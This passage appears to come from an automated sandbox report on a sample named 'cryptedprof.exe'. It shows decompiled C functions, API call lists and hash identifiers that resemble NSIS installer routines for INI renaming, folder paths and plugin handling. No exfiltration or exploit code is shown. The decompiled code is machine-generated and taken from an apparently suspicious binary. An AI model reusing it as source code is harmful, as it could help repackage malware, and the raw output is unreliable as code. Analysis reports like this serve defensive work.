                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F$Setup Setup
                                                                                        • API String ID: 941294808-1602013819
                                                                                        • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                        • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                                                        • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                        • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405EBC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c648 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
						_t53 = _t52 + 0x10;
						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA1(_t24 + _t46, 0x42c248, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E8D(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE6(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                        0x00405ebc
                                                                                        0x00405ec5
                                                                                        0x00405ecc
                                                                                        0x00405ee0
                                                                                        0x00405f08
                                                                                        0x00405f13
                                                                                        0x00405f17
                                                                                        0x00405f37
                                                                                        0x00405f3e
                                                                                        0x00405f48
                                                                                        0x00405f55
                                                                                        0x00405f5a
                                                                                        0x00405f5f
                                                                                        0x00405f63
                                                                                        0x00405f72
                                                                                        0x00405f74
                                                                                        0x00405f81
                                                                                        0x00405f85
                                                                                        0x00406020
                                                                                        0x00000000
                                                                                        0x00405f9b
                                                                                        0x00405fa8
                                                                                        0x00405fcc
                                                                                        0x00405fd0
                                                                                        0x00405fef
                                                                                        0x00405ff3
                                                                                        0x00405ff3
                                                                                        0x00405ff5
                                                                                        0x00405ffe
                                                                                        0x00406009
                                                                                        0x00406014
                                                                                        0x0040601a
                                                                                        0x00000000
                                                                                        0x0040601a
                                                                                        0x00405fd2
                                                                                        0x00405fd5
                                                                                        0x00405fe0
                                                                                        0x00405fdc
                                                                                        0x00405fde
                                                                                        0x00405fdf
                                                                                        0x00405fdf
                                                                                        0x00405fe7
                                                                                        0x00405fe9
                                                                                        0x00000000
                                                                                        0x00405fe9
                                                                                        0x00405fb3
                                                                                        0x00405fb9
                                                                                        0x00000000
                                                                                        0x00405fb9
                                                                                        0x00405f85
                                                                                        0x00405f63
                                                                                        0x00405ee2
                                                                                        0x00405eed
                                                                                        0x00405ef6
                                                                                        0x00405efa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405efa
                                                                                        0x0040602b

                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
                                                                                        • GetShortPathNameA.KERNEL32 ref: 00405EF6
                                                                                          • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                          • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                        • GetShortPathNameA.KERNEL32 ref: 00405F13
                                                                                        • wsprintfA.USER32 ref: 00405F31
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                                                        • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                                                        • GlobalFree.KERNEL32 ref: 0040601A
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021
                                                                                          • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405DEA
                                                                                          • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                        • String ID: %s=%s$[Rename]
                                                                                        • API String ID: 2171350718-1727408572
                                                                                        • Opcode ID: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                                        • Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
                                                                                        • Opcode Fuzzy Hash: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                                        • Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004062E0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 72%
                                                                                        			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ec1c; // 0x6301d0
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f498;
				_t39 = 0x42e3e0;
				_t90 = 0x42e3e0;
				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004061AB(_t90,  *0x42f448);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406528(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f44c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4e4;
						if( *0x42f4e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f444;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062E0(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E0040624D(_a4, _t39);
			}



























                                                                                        0x004062e0
                                                                                        0x004062e0
                                                                                        0x004062e0
                                                                                        0x004062e6
                                                                                        0x004062eb
                                                                                        0x004062ed
                                                                                        0x004062fc
                                                                                        0x004062fc
                                                                                        0x00406304
                                                                                        0x00406305
                                                                                        0x00406306
                                                                                        0x00406307
                                                                                        0x0040630a
                                                                                        0x00406312
                                                                                        0x00406314
                                                                                        0x0040632b
                                                                                        0x0040632e
                                                                                        0x0040632e
                                                                                        0x00406505
                                                                                        0x00406505
                                                                                        0x00406509
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040633b
                                                                                        0x00406341
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406347
                                                                                        0x00406348
                                                                                        0x0040634b
                                                                                        0x0040634e
                                                                                        0x004064f8
                                                                                        0x00406502
                                                                                        0x00406504
                                                                                        0x00406504
                                                                                        0x004064fa
                                                                                        0x004064fc
                                                                                        0x004064fe
                                                                                        0x004064ff
                                                                                        0x004064ff
                                                                                        0x00000000
                                                                                        0x004064f8
                                                                                        0x00406354
                                                                                        0x00406358
                                                                                        0x00406368
                                                                                        0x0040636f
                                                                                        0x00406372
                                                                                        0x0040637a
                                                                                        0x0040637d
                                                                                        0x00406384
                                                                                        0x00406385
                                                                                        0x00406388
                                                                                        0x004064a5
                                                                                        0x004064a8
                                                                                        0x004064d8
                                                                                        0x004064db
                                                                                        0x004064e0
                                                                                        0x004064e4
                                                                                        0x004064e4
                                                                                        0x004064e9
                                                                                        0x004064ef
                                                                                        0x004064f1
                                                                                        0x00000000
                                                                                        0x004064f1
                                                                                        0x004064aa
                                                                                        0x004064ad
                                                                                        0x004064c2
                                                                                        0x004064c9
                                                                                        0x004064af
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064d1
                                                                                        0x004064d4
                                                                                        0x0040649d
                                                                                        0x0040649e
                                                                                        0x0040649e
                                                                                        0x00000000
                                                                                        0x004064d4
                                                                                        0x0040638e
                                                                                        0x00406395
                                                                                        0x00406397
                                                                                        0x00406398
                                                                                        0x004063b2
                                                                                        0x004063b2
                                                                                        0x004063b9
                                                                                        0x004063b9
                                                                                        0x004063c0
                                                                                        0x004063c4
                                                                                        0x004063c4
                                                                                        0x004063c5
                                                                                        0x004063c7
                                                                                        0x00406400
                                                                                        0x00406403
                                                                                        0x00406413
                                                                                        0x00406416
                                                                                        0x0040641e
                                                                                        0x00406424
                                                                                        0x00406424
                                                                                        0x00406483
                                                                                        0x00406483
                                                                                        0x00406485
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406428
                                                                                        0x0040642f
                                                                                        0x00406430
                                                                                        0x00406432
                                                                                        0x0040644c
                                                                                        0x0040645a
                                                                                        0x00406460
                                                                                        0x00406462
                                                                                        0x00406480
                                                                                        0x00406480
                                                                                        0x00406480
                                                                                        0x00000000
                                                                                        0x00406480
                                                                                        0x00406468
                                                                                        0x00406471
                                                                                        0x00406474
                                                                                        0x0040647a
                                                                                        0x0040647e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040647e
                                                                                        0x00406434
                                                                                        0x00406437
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406446
                                                                                        0x00406448
                                                                                        0x0040644a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040644a
                                                                                        0x00000000
                                                                                        0x00406483
                                                                                        0x0040640b
                                                                                        0x00000000
                                                                                        0x004063c9
                                                                                        0x004063e4
                                                                                        0x004063e9
                                                                                        0x004063ec
                                                                                        0x0040648c
                                                                                        0x0040648c
                                                                                        0x00406490
                                                                                        0x00406498
                                                                                        0x00406498
                                                                                        0x00000000
                                                                                        0x00406490
                                                                                        0x004063f6
                                                                                        0x00406487
                                                                                        0x00406487
                                                                                        0x0040648a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040648a
                                                                                        0x004063c7
                                                                                        0x0040639a
                                                                                        0x0040639e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004063a0
                                                                                        0x004063a4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004063a6
                                                                                        0x004063aa
                                                                                        0x00000000
                                                                                        0x004063ac
                                                                                        0x004063ac
                                                                                        0x00000000
                                                                                        0x004063ac
                                                                                        0x004063aa
                                                                                        0x0040650f
                                                                                        0x00406519
                                                                                        0x00406525
                                                                                        0x00406525
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 0040640B
                                                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                                                        • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
                                                                                        • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                                                        • lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 717251189-1230650788
                                                                                        • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                        • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                                                        • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                        • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 709924D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 89%
                                                                                        			E709924D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E70991215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M70992626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x7099307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7099309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E70991429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x7099405c);
								goto L17;
							case 4:
								__ecx =  *0x7099405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x7099405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								" {*v@u*v"();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7099405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x70994000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E709912D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E70991266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                                        0x709924e4
                                                                                        0x709924e6
                                                                                        0x709924f0
                                                                                        0x709924f6
                                                                                        0x70992500
                                                                                        0x70992504
                                                                                        0x70992509
                                                                                        0x70992509
                                                                                        0x70992511
                                                                                        0x70992518
                                                                                        0x7099251e
                                                                                        0x00000000
                                                                                        0x70992525
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099252c
                                                                                        0x70992530
                                                                                        0x70992533
                                                                                        0x70992537
                                                                                        0x7099253e
                                                                                        0x70992542
                                                                                        0x70992548
                                                                                        0x7099254a
                                                                                        0x7099254c
                                                                                        0x7099254c
                                                                                        0x70992553
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099255c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099256c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992598
                                                                                        0x709925a0
                                                                                        0x709925aa
                                                                                        0x709925ac
                                                                                        0x709925b1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992574
                                                                                        0x70992578
                                                                                        0x7099257a
                                                                                        0x7099257b
                                                                                        0x7099257d
                                                                                        0x7099258d
                                                                                        0x70992594
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709925b7
                                                                                        0x709925b9
                                                                                        0x709925bf
                                                                                        0x709925c5
                                                                                        0x709925c5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099251e
                                                                                        0x709925c8
                                                                                        0x709925c8
                                                                                        0x709925cd
                                                                                        0x709925de
                                                                                        0x709925de
                                                                                        0x709925e4
                                                                                        0x709925e9
                                                                                        0x709925ee
                                                                                        0x709925fa
                                                                                        0x709925ff
                                                                                        0x00000000
                                                                                        0x70992604
                                                                                        0x709925f0
                                                                                        0x709925f1
                                                                                        0x70992605
                                                                                        0x70992605
                                                                                        0x709925ee
                                                                                        0x70992606
                                                                                        0x7099260a
                                                                                        0x7099260d
                                                                                        0x70992625

                                                                                        APIs
                                                                                          • Part of subcall function 70991215: GlobalAlloc.KERNEL32(00000040,70991233,?,709912CF,-7099404B,709911AB,-000000A0), ref: 7099121D
                                                                                        • GlobalFree.KERNEL32 ref: 709925DE
                                                                                        • GlobalFree.KERNEL32 ref: 70992618
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID: {*v@u*v
                                                                                        • API String ID: 1780285237-3183337590
                                                                                        • Opcode ID: 7ea65bb1c61269c3026b06774d6e4150d858db64fd86abd4fec6877204633449
                                                                                        • Instruction ID: fb7d1864557e402c93c165c48a471039844fedf89609e252003079000515331d
                                                                                        • Opcode Fuzzy Hash: 7ea65bb1c61269c3026b06774d6e4150d858db64fd86abd4fec6877204633449
                                                                                        • Instruction Fuzzy Hash: 8B41A072128200EFD706CF55CC94EAE7BBEEBC5204B22452EF542A7220D735AD04EB67
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 709922F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 86%
                                                                                        			E709922F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E709912AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E7099123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M7099247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E709912FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E709912FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E70991224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x7099405c =  *0x7099405c +  *0x7099405c;
									__edi = GlobalAlloc(0x40,  *0x7099405c +  *0x7099405c);
									 *0x7099405c = MultiByteToWideChar(0, 0, __ebx,  *0x7099405c, __edi,  *0x7099405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
